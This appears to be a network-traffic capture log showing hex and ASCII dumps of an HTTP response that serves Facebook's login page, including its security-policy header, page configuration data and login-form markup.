                                                                                                                                  2022-10-17 20:07:24 UTC1630INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:24 UTC1632INData Raw: 63 65 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 4c 56 48 76 33 4b 58 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce42<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0LVHv3KX">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:24 UTC1633INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:24 UTC1635INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:24 UTC1636INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 70 33 73 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 61 49 34 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 4d 62 73 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 32 51 55 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmp3s"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFaI4"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtMbs"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwq2QU"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:24 UTC1638INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:24 UTC1639INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 37 37 34 31 37 35 38 32 36 32 38 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575477417582628","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:24 UTC1641INData Raw: 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f
                                                                                                                                  Data Ascii: NESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_
                                                                                                                                  2022-10-17 20:07:24 UTC1642INData Raw: 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c
                                                                                                                                  Data Ascii: toreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],
                                                                                                                                  2022-10-17 20:07:24 UTC1643INData Raw: 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 6f 79 65 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f
                                                                                                                                  Data Ascii: feKprlUUO1QS0oEqZoye","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkErro
                                                                                                                                  2022-10-17 20:07:24 UTC1645INData Raw: 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: s_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1
                                                                                                                                  2022-10-17 20:07:24 UTC1646INData Raw: 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22
                                                                                                                                  Data Ascii: er\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"
                                                                                                                                  2022-10-17 20:07:24 UTC1648INData Raw: 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 34 34 37 31 37 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 34 36 39 39 2e 36 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 34 36 39 39 2e 36 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22
                                                                                                                                  Data Ascii: urn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037244717,"timeOfRequestStart":1666037244699.6,"timeOfResponseStart":1666037244699.6},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"
                                                                                                                                  2022-10-17 20:07:24 UTC1649INData Raw: 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 2d 70 6e 68 59 30 6a 7a 73 6b 38 59 47 58 57 4f 67 5f 72 6d 30 6b 34 61 79 57 76 44 2d 57 6a 51 4f 30 58 71 47 4b 4c 55 6d 76 63 42 5a 4b 42 35 73 64 36 46 57 56 44 59 62 5a 41 63 66 65 32 43 38 5a 37 6a 31 4f 73 34 58 68 68 36 44 32 6c 37 42 43 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22
                                                                                                                                  Data Ascii: _bTcZI"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa2-pnhY0jzsk8YGXWOg_rm0k4ayWvD-WjQO0XqGKLUmvcBZKB5sd6FWVDYbZAcfe2C8Z7j1Os4Xhh6D2l7BC_bTcZI"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"
                                                                                                                                  2022-10-17 20:07:24 UTC1651INData Raw: 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d
                                                                                                                                  Data Ascii: seover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{}
                                                                                                                                  2022-10-17 20:07:24 UTC1652INData Raw: 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 30 4c 56 48 76 33 4b 58 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 34 34 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30
                                                                                                                                  Data Ascii: - _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="0LVHv3KX">requireLazy(["bootstrapWebSession"],function(j){j(1666037244)})</script><div class="_li" id="u_0_0
                                                                                                                                  2022-10-17 20:07:24 UTC1654INData Raw: 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65 73
                                                                                                                                  Data Ascii: " id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_ses
                                                                                                                                  2022-10-17 20:07:24 UTC1655INData Raw: 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65
                                                                                                                                  Data Ascii: v></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a hre
                                                                                                                                  2022-10-17 20:07:24 UTC1657INData Raw: 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d 6e
                                                                                                                                  Data Ascii: eturn function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=n
